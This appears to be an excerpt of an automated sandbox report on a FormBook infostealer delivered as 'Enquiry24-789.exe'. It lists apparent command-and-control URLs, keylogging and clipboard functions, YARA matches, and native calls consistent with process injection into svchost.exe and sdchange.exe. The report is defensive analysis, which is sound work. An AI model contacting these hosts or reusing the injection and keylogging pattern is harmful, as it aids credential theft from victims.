Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:55 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 20:24:01 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 75 6a 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dujn/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 20:24:04 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 75 6a 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dujn/ was not found on this server.</p></body></html>
Source: FNvzpsCDjtsg.exe, 00000008.00000002.3273598788.000000000113D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emme4.online
Source: FNvzpsCDjtsg.exe, 00000008.00000002.3273598788.000000000113D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emme4.online/dujn/
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10331
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdchange.exe, 00000005.00000003.2812307672.00000000079F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: sdchange.exe, 00000005.00000002.3274878431.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.00000000036D6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.udexo.net/7jx3/?UVlTmRqX=
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C4EAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00C4ED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C4EAFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_00C3AA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C69576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00C69576

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Binary is likely a compiled AutoIt script file
Source: Enquiry24-789.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Enquiry24-789.exe, 00000000.00000000.2028075623.0000000000C92000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bd7e973c-8
Source: Enquiry24-789.exe, 00000000.00000000.2028075623.0000000000C92000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_67a93b65-c
Source: Enquiry24-789.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a243ab49-c
Source: Enquiry24-789.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_35adfbe2-8
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Enquiry24-789.exe
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042CD0B NtClose, 2_2_0042CD0B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_05472DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_05472C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472B60 NtClose,LdrInitializeThunk, 2_2_05472B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054735C0 NtCreateMutant,LdrInitializeThunk, 2_2_054735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05474650 NtSuspendThread, 2_2_05474650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05474340 NtSetContextThread, 2_2_05474340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472D00 NtSetInformationFile, 2_2_05472D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472D10 NtMapViewOfSection, 2_2_05472D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472D30 NtUnmapViewOfSection, 2_2_05472D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472DD0 NtDelayExecution, 2_2_05472DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472DB0 NtEnumerateKey, 2_2_05472DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472C60 NtCreateKey, 2_2_05472C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472C00 NtQueryInformationProcess, 2_2_05472C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472CC0 NtQueryVirtualMemory, 2_2_05472CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472CF0 NtOpenProcess, 2_2_05472CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472CA0 NtQueryInformationToken, 2_2_05472CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472F60 NtCreateProcessEx, 2_2_05472F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472F30 NtCreateSection, 2_2_05472F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472FE0 NtCreateFile, 2_2_05472FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472F90 NtProtectVirtualMemory, 2_2_05472F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472FA0 NtQuerySection, 2_2_05472FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472FB0 NtResumeThread, 2_2_05472FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472E30 NtWriteVirtualMemory, 2_2_05472E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472EE0 NtQueueApcThread, 2_2_05472EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472E80 NtReadVirtualMemory, 2_2_05472E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472EA0 NtAdjustPrivilegesToken, 2_2_05472EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472BE0 NtQueryValueKey, 2_2_05472BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472BF0 NtAllocateVirtualMemory, 2_2_05472BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472B80 NtQueryInformationFile, 2_2_05472B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472BA0 NtEnumerateValueKey, 2_2_05472BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472AD0 NtReadFile, 2_2_05472AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472AF0 NtWriteFile, 2_2_05472AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472AB0 NtWaitForSingleObject, 2_2_05472AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473010 NtOpenDirectoryObject, 2_2_05473010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473090 NtSetValueKey, 2_2_05473090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473D70 NtOpenThread, 2_2_05473D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05473D10 NtOpenProcessToken, 2_2_05473D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054739B0 NtGetContextThread, 2_2_054739B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B4650 NtSuspendThread,LdrInitializeThunk, 5_2_046B4650
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B4340 NtSetContextThread,LdrInitializeThunk, 5_2_046B4340
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2C60 NtCreateKey,LdrInitializeThunk, 5_2_046B2C60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_046B2C70
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_046B2CA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_046B2D30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_046B2D10
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_046B2DF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_046B2DD0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_046B2EE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_046B2E80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2F30 NtCreateSection,LdrInitializeThunk, 5_2_046B2F30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2FE0 NtCreateFile,LdrInitializeThunk, 5_2_046B2FE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2FB0 NtResumeThread,LdrInitializeThunk, 5_2_046B2FB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2AF0 NtWriteFile,LdrInitializeThunk, 5_2_046B2AF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2AD0 NtReadFile,LdrInitializeThunk, 5_2_046B2AD0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2B60 NtClose,LdrInitializeThunk, 5_2_046B2B60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_046B2BE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_046B2BF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_046B2BA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B35C0 NtCreateMutant,LdrInitializeThunk, 5_2_046B35C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B39B0 NtGetContextThread,LdrInitializeThunk, 5_2_046B39B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2C00 NtQueryInformationProcess, 5_2_046B2C00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2CF0 NtOpenProcess, 5_2_046B2CF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2CC0 NtQueryVirtualMemory, 5_2_046B2CC0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2D00 NtSetInformationFile, 5_2_046B2D00
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2DB0 NtEnumerateKey, 5_2_046B2DB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2E30 NtWriteVirtualMemory, 5_2_046B2E30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2EA0 NtAdjustPrivilegesToken, 5_2_046B2EA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2F60 NtCreateProcessEx, 5_2_046B2F60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2FA0 NtQuerySection, 5_2_046B2FA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2F90 NtProtectVirtualMemory, 5_2_046B2F90
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2AB0 NtWaitForSingleObject, 5_2_046B2AB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B2B80 NtQueryInformationFile, 5_2_046B2B80
